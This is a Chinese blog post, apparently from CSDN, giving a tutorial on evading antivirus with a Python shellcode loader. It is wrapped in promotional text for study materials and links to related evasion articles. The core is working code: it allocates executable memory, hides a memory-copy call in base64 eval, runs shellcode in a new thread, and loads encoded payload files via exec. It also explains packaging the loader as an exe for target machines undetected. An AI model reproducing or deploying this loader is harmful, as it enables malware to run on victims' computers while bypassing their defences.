【免杀】分离免杀(python)_shellcode loader免杀,社招面试题目

最新推荐文章于 2024-07-27 12:20:46 发布
最新推荐文章于 2024-07-27 12:20:46 发布
阅读量684 收藏 16
点赞数 14
分类专栏: 2024年程序员学习 文章标签: python 面试 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84140347/article/details/137804659
版权

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新Python全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img



既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上Python知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以添加V获取:vip1024c (备注Python)
img

正文


loader加密

from base64 import b64encode

下面是加载器的核心函数

code = “”“def shellCodeLoad(shellcode):
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
eval(base64.b64decode(“Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ==”))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))”“”
print(b64encode(code.encode()))


将加密的数据写入到另外的文件中,loader.txt和shellcode1.txt中

from base64 import b32decode, b64decode, b64encode
import ctypes
import base64
import py2exe
import distutils

f = open(‘shellcode1.txt’)
code = f.read()
code = b32decode(b64decode(code))
f.close()

exec(code.decode())

f2=open(‘loader.txt’)
loader=f2.read()
f2.close()
exec(b64decode(loader).decode())

shellCodeLoad(shellcode)


运行代码,成功上线  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/949b1cacf78a4c59989a5ac0a701c270.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/a9fe82a395854d04a62c010528c9341e.png)


## 打包exe


现在功能实现完了,该打包了,linux可能都有python环境,但是window不一定,所以需要打包成exe文件,需要pyinstaller或者py2exe

pip install pyinstaller或
pip install py2exe


[pyinstaller安装使用]( )  
 [py2exe安装使用]( )  
 还需要手动把loader.txt和shellcode1.txt放到和exe文件一个目录,以后使用的时候就打包直接发靶机上


都可以,我测试过两种打包方法都不会报毒


## 结果


报毒报的是之前我打靶机时候下的exp或者别的毒  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/7b2cc09193ab4b0db663164aef1e8e35.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/cc1cfff25a1845d3aca068d5e8f35fac.png)  
 不知道什么情况,是不检测zip吗?另一个检测网站也是这样子的  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/97797a6538b9472ca2931354284521a3.png)


[参考链接]( )







现在能在网上找到很多很多的学习资源,有免费的也有收费的,当我拿到1套比较全的学习资源之前,我并没着急去看第1节,我而是去审视这套资源是否值得学习,有时候也会去问一些学长的意见,如果可以之后,我会对这套学习资源做1个学习计划,我的学习计划主要包括规划图和学习进度表。



分享给大家这份我薅到的免费视频资料,质量还不错,大家可以跟着学习

![](https://img-blog.csdnimg.cn/img_convert/21b2604bd33c4b6713f686ddd3fe5aff.png)




**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**需要这份系统化的资料的朋友,可以添加V获取:vip1024c (备注python)**
![img](https://img-blog.csdnimg.cn/img_convert/23fd70e56552011488185fb6ea401d9a.png)

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
4DwUbYfI-1713215481897)]

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
2401_84140347
关注
  • 14
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2024年Python最新【免杀分离免杀python)_shellcode loader免杀
2401_84585462的博客
05-01 367
import sysf.close()loader加密。
Python3 Cobalt strike shellcode 免杀过 360 卫士和360杀毒
课嗨教育的专栏
09-09 683
Python2.7 现在很多杀毒软件都会查杀免杀效果有点差。可以使用 python3 来做 shellcode免杀处理。 Python3 下载下载最新的版本当前实验的版本是 Python 3.8.6 64 位pyinstaller 4.0 https://www.python.org/downloads/pip install pyinstaller Python3 shellcode 加载代码import ctypes #shellcode 加载 def shel...
免杀笔记 ----> ShellCode Loader !!!
huohaowen的博客
07-05 880
学了那么久的前置知识,终于到了能上线的地方了!!!不过这里还没到免杀的部分,距离bypass一众的杀毒软件还有很长的路要走!!
免杀分离免杀python
zhangshuaiijie的博客
06-28 696
shellcode是一段用于利用软件漏洞的有效负载代码,以其经常让攻击者获得shell而得名shellcode loader加载器是用来运行shellcode的加载器,用什么语言来写都可以思路就是将shellcodeloader分离开来,用loader加载存在于普通文件中的shellcode
老树开新花之shellcode_launcher免杀Windows Defender
crowsec
01-17 2475
微信公众号:乌鸦安全 扫取二维码获取更多信息! 免杀效果 静态免杀 动态免杀效果(指的是可执行命令) 1. 准备条件 本文中的免杀方式在我写完文章之后,免杀基本已经失效,毕竟是见光死,所以仅供各位师傅参考,内容上如有错误,希望师傅们能够指正! 本文在测试时,发现可免杀最新版火绒、最新版联网360、Windows Defender最新版(关闭可疑文件上传)。 本文工具已打包至我的GitHub,欢迎多多star: https://github.com/crow82.
DLL+Shellcode的Windows注入免杀工具
Fly_鹏程万里
05-23 445
S-inject是一款支持x86/x64的DLL和Shellcode 的Windows注入的免杀工具,支持图形化界。
shellcode免杀工具Go_Bypass的使用
热门推荐
江左盟的博客
02-28 2万+
简介 该工具是由Arks7使用Go语言开发的一个免杀生成器模板,前可以过国内主流杀毒。 GitHub地址: https://github.com/Arks7/Go_Bypass 用法 使用CobaltStrike生成payload,输出格式为Raw,4.3版本需要勾选X64,如图: 将生成的文件放在Go_Bypass项录下,然后执行go env -w GOPROXY=https://goproxy.io,direct配置代理,否则编译报错。然后运行go run main.go,使用默认配置一路回车即
免杀工具】Windows通用免杀shellcode加载器
Fly_鹏程万里
06-11 543
本工具由ShellQMaker.exe和加载模板文件(loading.exe)组成。ShellQMaker.exe将不同的shellcode写入加载的模板文件(loading.exe)中,生成不同的可执行文件。运行环境:加载器模板通过QT实现使用C++开发,并由VS2022静态编译,前只有一种加载模式,其他加载模式正在开发中。使用方法:使用vs2022打开项解决方案(.sln),然后进行编译即可,当然你也可以从。ShellQMaker (你的shellcode) (生成的可执行文件)
python打包的exe如何免杀_CS强化_python免杀
weixin_39947314的博客
11-26 672
CS作为主流红队工具,其在后渗透中的地位自不用说,功能强大,但如何让它活下去就成了个人发挥的内容,今天我们以python payload为例展开。payload生成通过cs自动生成我们python payload:值得一提的是360、电脑管家等均为对该payload报毒,倒是Windows Defender觉得事情没那么简单,显然不装杀毒软件的PC是最难搞的23333,因为它会默认开启Window...
通过Python实现Payload分离免杀过程详解
01-19
msf生成shellcode代码: 将payload给copy下来,去除引号。 \x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42 \x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33 \x49\x6f\x44\x37\x64\...
CS木马免杀技巧分享.pdf
08-11
01Shellcode加载器 02 Powershell免杀 03 利用场景介绍
源码免杀-花指令
08-21
3. **免杀技术的应用**:免杀不仅仅局限于花指令,还包括其他多种技术,如API混淆、壳代码(Shellcode)隐藏、虚拟机绕过等。这些技术组合使用,可以构建更复杂的免杀策略。例如,使用API混淆技术可以改变函数调用的...
python反序列化-分离免杀1
08-03
在本文中,我们将深入探讨如何利用 Python 反序列化进行免杀技术,特别是“分离免杀”策略。 免杀技术的主要标是让恶意代码避开安全软件的检测,从而在标系统上成功执行。常见的免杀方法包括修改特征码、使用花...
最新免杀360,基于shellcode字符混淆
06-22
基于Shellcode的字符混淆是一种常见的技术,用于使恶意代码逃避反病毒软件和其他安全解决方案的检测。壳代码(Shellcode)是一段非常短小的机器码,通常用于实现特定的功能,如创建后门或执行命令行。由于其精简性和...
快醒醒,别睡了!...讲《数据分析pandas库》了—/—<4>
最新发布
qq_64603703的博客
07-27 551
详细解说数据分析pandas库中的常用方法
全网最详细Gradio教程系列5——Gradio Client: python
shao918516的博客
07-26 738
程序部署完成后,如何将Gradio App作为API访问使用呢,这就用到Gradio Client。本章讲解Gradio Client的三种使用方式:pythonjavascript和curl,受字数限制,所以分三篇博客发布。 使用Gradio Python Client非常易于将Gradio应用程序作为API使用,本节讲述gradio_client安装、如何连接Gradio应用程序、查看可用API及其使用方式、job及session等用法。 通过Gradio Python Cli
随机数种子的作用
帆的博客
07-23 1259
设置随机数种子(random seed)的的是为了确保随机数生成器在每次运行时产生相同的随机数序列,从而保证实验结果的一致性。随机数种子通过初始化随机数生成器的内部状态,使得在相同的种子值下,随机数生成器每次调用时生成的序列是相同的。
全面解析 SnowNLP:中文文本处理、情感分析
有勇气的牛排博客
07-24 452
SnowNLP 是一个专门用于处理中文文本的 Python库。分词情感分析关键词提取文本分类拼音转换繁体转简体词相似度计算等测试环境:Python3.10.9尚未测出该功能text = "有勇气的牛排写的文章通俗易懂,爱了爱了"文本分类使用的是 SnowNLP 的情感分析模型。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值